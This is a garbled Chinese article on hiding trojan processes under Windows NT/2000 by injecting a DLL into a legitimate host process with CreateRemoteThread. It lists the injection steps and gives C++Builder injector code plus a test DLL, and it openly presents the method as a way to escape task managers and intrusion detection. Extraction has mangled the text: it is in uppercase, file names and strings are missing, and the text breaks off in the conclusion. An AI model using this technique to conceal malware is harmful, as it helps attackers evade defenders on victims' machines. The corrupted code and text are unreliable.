windows nt-2000系统下进程的隐藏(1)

1/11WINDOWSNT/2000系统下进程的隐藏1摘要进程的隐藏一直是木马程序设计者不断探求的重要技术，本文采用远程线程技术，通过动态链接库方法，较好地解决了这一问题，通过远程线程将木马作为线程隐藏在其他进程中，从而达到隐藏的目的。关键字进程线程木马动态链接库木马程序也称后门程序是能被控制的运行在远程主机上的程序，由于木马程序是运行在远程主机上，所以进程的隐藏无疑是大家关心的焦点。本文分析了WINDOWSNT/2000系统下进程隐藏的基本技术和方法，并着重讨论运用线程嫁接技术如何实现WINDOWSNT/2000系统中进程的隐藏。1基本原理在WIN95/98中，只需要将进程注册为系统服务就能够从进程查看器中隐形，可是这一切在WINDOWSNT/2000中却完全不同，无论木马从端口、启动文件上如何巧妙地隐藏自己，始终都不能躲过WINDOWSNT/2000的任务管理器，WINDOWSNT/2000的任务管理器均能轻松显示出木马进程，难道在WINDOWSNT/2000下木马真的再也无法隐藏自己的进程了我们知道，在WINDOWS系统下，可执行文件主要是EXE和COM文件，这两种文件在运行时都有一个共同点，2/11会生成一个独立的进程，寻找特定进程是我们发现木马的方法之一，随着入侵检测软件的不断发展，关联进程和SOCKET已经成为流行的技术，假设一个木马在运行时被检测软件同时查出端口和进程，我们基本上认为这个木马的隐藏已经完全失败。在WINDOWSNT/2000下正常情况用户进程对于系统管理员来说都是可见的，要想做到木马的进程隐藏，有两个办法，第一是让系统管理员看不见你的进程；第二是不使用进程。本文以第二种方法为例加以讨论，其基本原理是将自已的木马以线程方式嫁接于远程进程之中，远程进程则是合法的用户程序，这样用户管理者看到的只是合法进程，而无法发现木马线程的存在，从而达到隐藏的目的。实现方法为了弄清实现方法，我们必须首先了解WINDOWS系统的另一种“可执行文件“DLL，DLL是DYNAMICLINKLIBRARY的缩写，DLL文件是WINDOWS的基础，因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑，是由多个功能函数构成，它并不能独立运行，一般都是由进程加载并调用的。因为DLL文件不能独立运行，所以在进程列表中并不会出现DLL，假设我们编写了一个木马DLL，并且通过别的进程来运行它，那么无论是入侵检测软件还是进程列表中，都只会出现那个进程而并不会出现木马3/11DLL，如果那个进程是可信进程，那么我们编写的DLL作为那个进程的一部分，也将成为被信赖的一员，也就达到了隐藏的目的。运行DLL方法有多种，但其中最隐蔽的方法是采用动态嵌入技术，动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说，在WINDOWS中的每个进程都有自己的私有内存空间，别的进程是不允许对这个私有空间进行操作的，但是实际上，我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如窗口HOOK、挂接API、远程线程等，这里介绍一下远程线程技术，它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道，在进程中，可以通过CREATETHREAD函数创建线程，被创建的新线程与主线程共享地址空间以及其他的资源。但是很少有人知道，通过CREATEREMOTETHREAD也同样可以在另一个进程内创建新线程，被创建的远程线程同样可以共享远程进程的地址空间，所以，实际上，我们通过一个远程线程，进入了远程进程的内存地址空间，也就拥有了那个远程进程相当的权限。实施步骤4/111）用PROCESS32NEXT函数找到宿主进程,获取宿主进程ID,并用OPENPROCESS函数打开宿主进程。2）用VIRTUALALLOCEX函数分配远程进程地址空间中的内存。3）用WRITEPROCESSMEMORY函数将待隐藏的DLL的路径名。4）拷贝到步骤二已经分配的内存中。5）用GETPROCADDRESS函数获取LOADLIBRARYA函数的实地址。6）用CREATEREMOTETHREAD函数在远程进程中创建一个线程。7）它调用正确的LOADLIBRARYA函数。8）为它传递步骤二中分配的内存地址。转贴于论文联盟HTTP/具体实例下面是在C环境下编写的运用远程线程技术隐藏木马的程序代码INCLUDEINCLUDEINCLUDEINCLUDE/该头文件包涵了进程操作的API函数PRAGMAHDRSTOP5/11INCLUDE“PRAGMAPACKAGESMART_INITPRAGMARESOURCE“DFM“INSISTINGPSZLIBFILENAME/存放待隐藏的DLL文件名HANDLEHPROCESSSNAPNULL/进程快照句柄HANDLEHREMOTEPROCESS/远程进程句柄LPVOIDPSZLIBFILEREMOTE/远程进程中分配给文件名的空间HMODULEPHMD/存放句柄HANDLEHREMOTETHREAD1NULL/存放远程线程句柄TFORM1FORM1/_FASTCALLTFORM1TFORM1TCOMPONENTOWNERTFORMOWNER/VOID_FASTCALLTFORM1BUTTON1CLICKTOBJECTSENDER6/11PROCESSENTRY3PE320DWORDDWREMOTEPROCESSIDHPROCESSSNAPCREATETOOLHELP32SNAPSHOTTH32CS_SNAPPROCESS,0/打开进程快照IFHPROCESSSNAPHANDLE1MESSAGEBOXNULL,“CREATETOOLHELP32SNAPSHOTFAILED“,“,MB_OKEXIT0/失败返回SIZEOFPROCESSENTRY32IFPROCESS32FIRSTHPROCESSSNAP,TEIF“|“/找到宿主进程，以为例DWREMOTEPROCESSID7/11BREAKWHILEPROCESS32NEXTHPROCESSSNAP,/获取下一个进程ELSEMESSAGEBOXNULL,“取第一个进程失败“,“,MB_OKEXIT0HREMOTEPROCESSOPENPROCESSPROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,DWREMOTEPROCESSID/打开远程进程PSZLIBFILENAMEGETCURRENTDIR“/假设是待隐藏的进程INTCB1SIZEOFCHAR/计算DLL文件名长度8/11PSZLIBFILEREMOTEPWSTRVIRTUALALLOCEXHREMOTEPROCESS,NULL,CB,MEM_COMMIT,PAGE_READWRITE/申请存放文件名的空间BOOLRETURNCODEWRITEPROCESSMEMORYHREMOTEPROCESS,PSZLIBFILEREMOTE,LPVOID_STR,CB,NULL/把DLL文件名写入申请的空间PHMDGETMODULEHANDLE“LPTHREAD_START_ROUTINEFNSTARTADDRLPTHREAD_START_ROUTINEGETPROCADDRESSPHMD,“LOADLIBRARYA“/获取动态链接库函数地址HREMOTETHREAD1CREATEREMOTETHREADHREMOTEPROCESS,NULL,0,PFNSTARTADDR,PSZLIBFILEREMOTE,0,NULL/创建远程线程IFHREMOTETHREAD1NULLCLOSEHANDLEHREMOTETHREAD1/关闭远程线程IFHPROCESSSNAPNULLCLOSEHANDLEHPROCESSSNAP/关闭进程快照该程序编译后命名为,运行时点击界面上的按钮即9/11可。至此，远程嵌入顺利完成，为了试验我们的是不是已经正常地在远程线程运行，我同样在C环境下编写并编译了下面的作为测试INCLUDEINCLUDEPRAGMAHDRSTOPPRAGMAARGSUSEDBOOLWINAPIDLLENTRYPOINTHINSTANCEHINST,UNSIGNEDLONGREASON,VOIDLPRESERVEDCHARSZPROCESSID64SWITCHREASONCASEDLL_PROCESS_ATTACH/获取当前进程IDITOAGETCURRENTPROCESSID,SZPROCESSID,10MESSAGEBOXNULL,SZPROCESSID,“REMOTEDLL“,MB_OKBREAKDEFAULT10/11RETURNTRUE当使用程序将这个嵌入进程后假设PID1208），该测试DLL弹出了1208字样的确认框，同时使用PS工具也能看到PROCESSID120C0X00400000C0X100000000这证明已经在进程内正确地运行了。上面程序的头文件由编译器自动生成，未作改动，故略之。结束语进程隐藏技术和方法有很多，而且这一技